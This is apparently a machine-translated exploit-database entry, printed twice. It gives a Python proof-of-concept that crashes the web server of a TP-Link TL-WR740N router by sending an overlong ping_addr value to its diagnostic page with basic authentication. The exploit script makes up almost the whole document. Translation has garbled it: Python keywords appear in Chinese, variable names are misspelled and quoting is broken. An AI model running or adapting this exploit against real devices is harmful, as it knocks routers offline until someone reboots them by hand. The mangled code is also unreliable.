#利用标题: TP-Link TL-WR740N-缓冲区溢出'DOS'
#日期: 8/12/2023
#利用作者: Anish Feroz(Zeroxinn)
#供应商homepage3360 http://www.tp-link.com
#版本: TP-Link TL-WR740N 3.12.11构建110915 Rel.40896N
#在: TP-Link TL-WR740N上测试
#Description:
#在TP-Link TL-WR740路由器中存在缓冲区溢出漏洞,该路由器可以通过发送精心设计的请求来使攻击者在路由器上运行的Web服务器崩溃。要带回HTTP(WebServer),用户必须物理重新启动路由器。
#USAGE:
#python3目标用户名密码
#改变端口,如果需要
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/python
导入请求
从请求中
导入基础64
def send_request(IP,用户名,密码):
auth_url=f'http://{ip} :8082'
target_url=F'http://{ip} :8082/userrpm/pingiframerpm.htm?ping_addr=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaadotype=pingisnew=newsendnum=4psize=64overtime=800trhops=20'
凭据=f'{username} : {password}'
encoded_credentials=base64.b64encode(recortentials.encode())。decode()
标题={
'host': f'{ip} :8082',
'授权': f'basic {encoded_credentials}',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/95.0.4638.69
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/nigned-exchange; v=b3; q=b3; q=0.9'',Q=0.9',
'参考器: F'http://{ip} :8082/userrpm/diagnosticrpm.htm',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'Connection':'关闭'
}
session=requests.session()
响应=session.get(target_url,标头=标题)
if antsphy.status_code==200:
打印(“服务器崩溃”)
打印(响应。文本)
其他:
打印(使用状态代码{response.status_code}'完成(f'Script)
ip_address=输入('host:'的IP地址')
用户名=输入('Enter UserName:')
密码=输入('Enter Password:')
send_request(ip_address,用户名,密码)
#日期: 8/12/2023
#利用作者: Anish Feroz(Zeroxinn)
#供应商homepage3360 http://www.tp-link.com
#版本: TP-Link TL-WR740N 3.12.11构建110915 Rel.40896N
#在: TP-Link TL-WR740N上测试
#Description:
#在TP-Link TL-WR740路由器中存在缓冲区溢出漏洞,该路由器可以通过发送精心设计的请求来使攻击者在路由器上运行的Web服务器崩溃。要带回HTTP(WebServer),用户必须物理重新启动路由器。
#USAGE:
#python3目标用户名密码
#改变端口,如果需要
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/python
导入请求
从请求中
导入基础64
def send_request(IP,用户名,密码):
auth_url=f'http://{ip} :8082'
target_url=F'http://{ip} :8082/userrpm/pingiframerpm.htm?ping_addr=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaadotype=pingisnew=newsendnum=4psize=64overtime=800trhops=20'
凭据=f'{username} : {password}'
encoded_credentials=base64.b64encode(recortentials.encode())。decode()
标题={
'host': f'{ip} :8082',
'授权': f'basic {encoded_credentials}',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,例如Gecko)Chrome/95.0.4638.69
'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/nigned-exchange; v=b3; q=b3; q=0.9'',Q=0.9',
'参考器: F'http://{ip} :8082/userrpm/diagnosticrpm.htm',
'接受编码:'gzip,deflate',
'Accept-Language':'En-US,en; q=0.9',
'Connection':'关闭'
}
session=requests.session()
响应=session.get(target_url,标头=标题)
if antsphy.status_code==200:
打印(“服务器崩溃”)
打印(响应。文本)
其他:
打印(使用状态代码{response.status_code}'完成(f'Script)
ip_address=输入('host:'的IP地址')
用户名=输入('Enter UserName:')
密码=输入('Enter Password:')
send_request(ip_address,用户名,密码)
